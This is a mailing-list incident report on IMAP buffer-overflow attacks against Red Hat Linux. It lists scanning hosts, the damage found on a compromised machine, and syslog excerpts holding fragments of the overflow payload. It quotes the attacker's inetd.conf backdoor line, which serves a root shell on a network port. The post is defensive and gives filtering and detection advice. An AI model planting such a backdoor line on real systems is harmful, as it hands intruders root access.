Re: IMAP attacks continue

[Phil Howard <phil () whistler intur net>]

Daniel Senie wrote:

> The frequency of IMAP attacks is increasing, and the number of IP
> addresses scanned per attack seems to be increasing as well. In the last
> 24 hours, I've been scanned by:
>
>       fermi.math.csi.cuny.edu
>       c149.lib.uci.edu
>       sockeye.cob.calpoly.edu
>       quebec.upa.qc.ca
>
> Anyone upstream of any of these able to add a Sniffer? It'd be
> interesting to see if someone is connected in via telnet or ssh and
> launching the attacks remotely. With all of these types of attack in the
> last several days, the systems doing the attacking have all been ones
> that were compromised.

I found a machine that had Red Hat 5.1 unmodified running on it, and it
got hit.  So I closed things off and looked around for damage and found
the following:

1.  Syslogd had been killed off and the syslog file deleted.

2.  A backdoor was installed in /etc/inetd.conf as follows:

ttalk   stream  tcp     nowait  root    /bin/sh         sh -i

I've temporarily added filters to block TCP ports 143 and 666 coming in
to my network (will have to open 143 back up if any of my customers are
using IMAP to their own servers from outside, but we don't do IMAP, yet,
so it's not an impact on me).  Whether or not it is practical to do it
on your network is something you'll have to figure out.  But I would
check any machines you have that might be at risk for these intrusion
signatures.  I can't imagine any reason anyone would execute any shell
from inetd, so if you find /bin/*sh in inetd.conf, worry (and take it
out).

I don't know if these attacks are specific to Red Hat Linux or if other
UNIX systems are at risk.  My Sparc/Linux box logged at attempted attack
that failed, possibly because the architecture wouldn't run the binary
code the attacker put in the buffer overflow.  This is what I found in
the log (times are CST with NTP running):

Nov 20 14:55:07 rigel pam[6172]: pam_get_user: no username obtained
Nov 20 14:55:56 rigel imapd[6174]: System break-in attempt, host=1Cust149.tnt1.new-york.ny.da.uu.net [208.250.139.149]
Nov 20 14:55:56 rigel
Nov 20 14:55:56 rigel syslogd: Cannot glue message parts together
Nov 20 14:55:56 rigel 22>Nov 20 14:55:56 imapd[6174]: AUTHENTICATE 
^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P!
!
^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P
Nov 20 14:55:56 rigel ^IF^L0^K^Is^MN^H^MV^LM
Nov 20 15:16:43 rigel imapd[6209]: System break-in attempt, host=usr3-20.gdi.net [209.26.33.148]
Nov 20 15:16:43 rigel syslogd: Cannot glue message parts together
Nov 20 15:16:44 rigel 
^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^Pk8^

-- 
 --    *-----------------------------*      Phil Howard KA9WGN       *    --
  --   | Inturnet, Inc.              | Director of Internet Services |   --
   --  | Business Internet Solutions |       eng at intur.net        |  --
    -- *-----------------------------*      philh at intur.net       * --